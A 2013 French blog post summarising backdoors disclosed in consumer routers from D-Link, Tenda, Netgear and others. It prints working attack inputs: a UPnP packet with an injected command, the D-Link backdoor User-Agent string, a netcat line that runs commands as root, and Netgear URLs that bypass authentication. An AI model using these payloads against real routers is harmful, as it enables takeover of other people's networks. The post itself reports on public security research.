Routeurs déchus
mercredi 30 octobre 2013 à 02:04En ce mois d'octobre, j'ai observé une recrudescence de portes dérobées (ou backdoors) dans des routeurs grand public. Je vais tenter de regrouper des liens et donner un minimum d'explications, ça fera un petit guide de dépannage ☠
Voici la liste des routeurs recensés :
- D-Link DI-524UP
- D-Link DI-604S, DI-604UP, DI-604+
- D-Link DI-624
- D-Link DIR-100
- D-Link DIR-120
- D-Link DIR-815
- D-Link TM-G5240
- Medialink MWN-WAPR150N
- Netgear WNDR3700v4
- Netgear WNDR3800
- Netgear WNDR4700
- Planex BRL-04R, BRL-04UR, BRL-04CW
- Tenda W302R
- Tenda W330R
DLink DIR-815 UPnP Command Injection
Le 1er février 2013
Routeurs impactés : D-Link DIR-815.The Shadow File avait 20 minutes à tuer. Et voilà que le D-Link tombe. En forgeant un packet tel que celui-ci :
M-SEARCH * HTTP/1.1
HOST:239.255.255.250:1900
ST:uuid:`reboot` <-- Ici, la commande désirée
MX:2
MAN:"ssdp:discover"
Qu'il faut envoyer en multicast à l'addresse IP 239.255.255.250 sur le port UDP (1900). Il y a même un script python qui permet d'automatiser la tâche et spécifier une commande.Reverse Engineering a D-Link Backdoor
Le 12 octobre 2013
Routeurs impactés : D-Link DI-524UP, D-Link DI-604S, D-Link DI-604UP, D-Link DI-604+, D-Link DI-624, D-Link DIR-100, D-Link DIR-120, D-Link TM-G5240, Planex BRL-04R, Planex BRL-04UR et Planex BRL-04CW.Un chercheur en sécurité de chez /dev/ttyS0 à découvert qu'un certain Joel à implémenté une porte dérobée dans les routeurs utilisant le firmware v1.13. L'exploit est on ne peut plus simple : il suffit de modifier l'User-Agent tel que :
xmlset_roodkcableoj28840ybtide
Pour le côté fun, si on lit à l'envers, ça donne « Edit by 04882 Joel Backdoor ». Merci Joel.From China, With Love
Le 17 octobre 2013
Routeurs impactés : Tenda W302R, Tenda W330R ou encore Medialink MWN-WAPR150N.Toujours un chercheur en sécurité de chez /dev/ttyS0, tout se passe au niveau de la forge du packet :
echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 IP_routeur 7329
Notez le "/bin/ls" dans le "echo", c'est la commande qui sera exécutée en root...Complete, Persistent Compromise of Netgear Wireless Routers
Le 22 octobre 2013
Routeurs impactés : Netgear WNDR3700v4, Netgear WNDR3800 et Netgear WNDR4700.The Shadow File a mis à mal les routeurs Netgear, bien comme il faut...
Il suffit de se rendre à l'adresse suivante pour désactiver totalement le contrôle d'accès :
http://IP_routeur/BRS_02_genieHelp.html
Pour voir les mots de passe Wi-Fi en clair :
http://IP_routeur/BRS_success.html
Et puis on peut aussi passer des commandes shell, sinon c'est pas rigolo. J'en garde une copie, juste au cas où.
Bref !
Comme disait Pépin.
J'ai bien peur que d'autres soient à venir... En attendant, quelques lecture intéressantes :
- Alice in Router-land: Down The MP-202 Hole qui s'occupe de l'AudioCodes MP-202